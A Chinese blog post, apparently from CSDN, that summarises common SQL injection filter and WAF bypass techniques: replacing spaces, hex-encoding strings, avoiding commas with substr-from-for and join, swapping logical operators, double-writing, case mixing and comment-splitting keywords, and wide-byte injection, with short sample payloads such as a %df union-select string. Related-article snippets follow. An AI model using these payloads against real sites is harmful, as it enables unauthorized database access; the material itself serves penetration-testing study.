sql注入常见绕过方法

已于 2023-09-05 15:11:18 修改
阅读量6.2k 收藏 32
点赞数 1
分类专栏: web渗透 文章标签: 网络安全
于 2023-09-05 15:09:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljlrookiebird/article/details/132689961
版权

一.绕过空格

1.使用tab缩进尝试绕过

2.尝试使用%a0来代替空格

3.使用()括号来绕过:

4.使用注释符号/**/绕过

二.过滤双引号绕过

使用十六进制代替

 将zhangsan变为16进制后正常输出

三.绕过逗号 

1.使用from

布尔型盲注的时候用来猜数据库名称时的测试语句通常为

1 and substr(database(),1,1)='e'--+

使用from for变为:

1 and substr (substr(database() from 1  for 1))='e'--+

2.使用join

union 联合注入查询通常使用的语句为

union select 1,2 --+

使用join变为

union select *  from (select 1)a join (select 2)b --+

3.offset 

limit 语句通常为从第几条开始取多少条数据,后面跟上offset,limit表示要取的数据量,offset表示要跳过的数据量

四.过滤or 、and、xor、not绕过

and = &&

or = ||

xor = |#(异或)

not = !

<>  =  !=  (不等于)

五.绕过等号

使用like,%表示通配符

六.绕过union,selcet,where,from等

1.双写绕过

如果防火墙只对敏感函数做了一次过滤,可以尝试使用双写绕过

union select * from test ;

变为:

ununionion sselectelect  * ffromrom test;

2.大小写绕过

如果防火墙只匹配全部小写或者大写的敏感函数,可以尝试使用大小写绕过

union select * from test ;

变为

UniON SelecT * From test;

3.注释符绕过

若防火墙只匹配完整的敏感函数可以使用注释符号将其分隔开来尝试绕过

union select * from test ;

变为:

u/**/nion sele/**/ct * fro/**/m test;

七.单引号过滤绕过

单引号被过滤可能是因为被转译了,这个时候我们可以尝试使用宽字节注入来尝试绕过

宽字节注入:web网站和数据库的编码格式不一样,导致信息传输的过程中单引号逃逸。gbk编码为两个字符,askii码为1个字节,使用%df‘,带入数据库的时候就会把单引号转义,变成%df\',正好反斜线的askii编码%5c和%df组成了一个新的汉字字符,导致单引号逃逸

示列:php?id=-1%df ' union select 1,2 --+

常见sql注入绕过方法
carmi的博客
01-17 4158
常见sql注入绕过方法 目录常见sql注入绕过方法1、空格过滤绕过漏洞代码示例/**/绕过制表符绕过换行符绕过括号绕过`反引号绕过2、内联注释绕过常见waf!!!】3、大小写绕过4、双写关键字绕过5、编码绕过漏洞示例代码双重URL编码绕过十六进制编码绕过Unicode编码绕过ASCII编码绕过6、等价函数字符替换绕过漏洞示例代码用like或in代替=逗号过滤等价函数7、逻辑符号替换8、宽字节绕...
SQL注入绕过
anlalu233的博客
10-18 597
注释符号绕过 大小写绕过 双写绕过 编码绕过 <>绕过 对空格的绕过 对or/and的绕过 对等号=的绕过单引号绕过 对逗号的绕过 过滤函数绕过 ...
黑客常用SQL注入绕过技术总结!(冰河吐血整理
q16974058的博客
04-08 1354
引领完成Docker的安装、部署、管理和扩展,让其经历从测试到生产的整个开发生命周期,深入了解Docker适用于什么场景。并且这本Docker的学习权威指南介绍了其组件的基础知识,然后用Docker构建容器和服务来完成各种任务:利用Docker为新项目建立测试环境,演示如何使用持续集成的工作流集成Docker,如何构建应用程序服务和平台,如何使用Docker的API,如何扩展Docker。
SQL注入绕过空格
nihao_ma_的博客
05-07 2341
SQL注入之空格绕过技巧
实战中各种SQL注入绕过姿势,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
02-24 982
这篇文章搜集整理自@Junehck师傅的Github,记录了他在实战中遇到的各种WAF拦截SQL注入的场景和绕过姿势,文章并不是完整的,仅记录了Bypass部分。黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」之间用两个 --%0a 会无响应。改为 1,页面返回 3 秒,执行了 3 次,不管输入多少都会被乘 3。
SQL注入实战:绕过操作
ting_liang的博客
01-27 3260
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
SQL注入绕过技巧
weixin_33970449的博客
07-29 1071
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,...
生命在于学习——SQL注入绕过
热门推荐
易水哲的博客
08-17 1万+
SQL注入绕过技术已经是一个老生常淡的内容了
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
过滤逗号是安全领域常见的一种防御SQL注入方法,因为SQL语句中逗号通常用于分隔不同的数据列。然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行...
SQL注入技术详解与过滤绕过方法
Cyc1e的博客
11-07 1906
SQL注入攻击是严重的安全威胁,可能导致数据库数据泄露或篡改。使用参数化查询或ORM框架,避免直接拼接SQL语句。对用户输入进行严格过滤和验证,限制输入的格式和范围。定期更新依赖库,修复已知的安全漏洞。然而,攻击者可能通过编码、注释、拆分关键字等方式绕过简单的防护机制。因此,开发者应使用多层次的防御方法,并定期对应用进行安全测试。
SQL注入绕过 单引号 限制继续注入
10-29
SQL注入是一种常见网络安全攻击手段,攻击者通过在Web表单输入或URL查询字符串中输入恶意SQL代码片段,试图对数据库执行非授权的操作。本文主要讨论的是在SQL注入过程中,如何绕过单引号限制以继续注入攻击,以及...
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤单引号(')或双引号(")的系统。...
SQL注入漏洞(绕过篇)
errorr0
06-24 5377
SQL注入绕过手法
SQL注入-绕过篇】
m0_62373986的博客
08-29 1603
绕过\的关键点在于网站在对输入数据进行处理时,只进行了一次URL编码,所以将%25转化成%后,不会再检查后面的%27。1、宽字节注入在上一篇博客讲到,是因%df+%5c结合为一个宽字节因为GBK编码组合成一个汉字,从而使\失效。2、除此之外,若\没有被网站过滤,也可以利用\对字符的转义来进行SQL注入。网站初次检测用户输入%2527,因为URL编码将%25转化成%,此时用户输入未检测到特殊字符,直接将%27输入到数据库中。2、若\没有被过滤,使用\令闭合符失效。1、宽字节绕过(%df%5c)
SQL注入---字符绕过
zhoutong2323的博客
04-10 2935
当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.and 和 or 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:符号被过滤 使用URL注入编码后 报错注入
sql注入常见绕过
weixin_55802150的博客
08-03 304
两个空格tab绕过/**/ 注释符绕过()把需要计算的地方用()包起来 可以绕过空格。
SQL注入学习总结(四):SQL注入中的绕过
weixin_30718391的博客
09-13 512
SQL注入中的绕过 一.对于关键字的绕过 注释符绕过:uni/**/on se/**/lect 大小写绕过:UniOn SeleCt 双关键字绕过:ununionion seselectlect <>绕过:unio<>n sel<>ect(可能是有些网站为了防止xss注入,所以过滤了<>,参照i春秋sql) 对于and,or的绕过其实还可以尝试一下...
sql注入 绕过
weixin_54472394的博客
06-05 216
2.单双引号 注释 过滤 3.双写绕过 4.关键字过滤 5.全部查出来 参数污染 一个成立即可 6.空格过滤 7.大小写 二次注入
SQL注入绕过技巧与WAF、D盾防范策略详解
在本篇文章中,我们将总结一些常用的SQL注入绕过方法,这些方法可以帮助安全研究人员了解攻击者如何绕过Web应用防火墙(WAF)和IPS(入侵防御系统)如D盾等防御机制。同时,了解这些技术也是为了更好地防范此类攻击...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值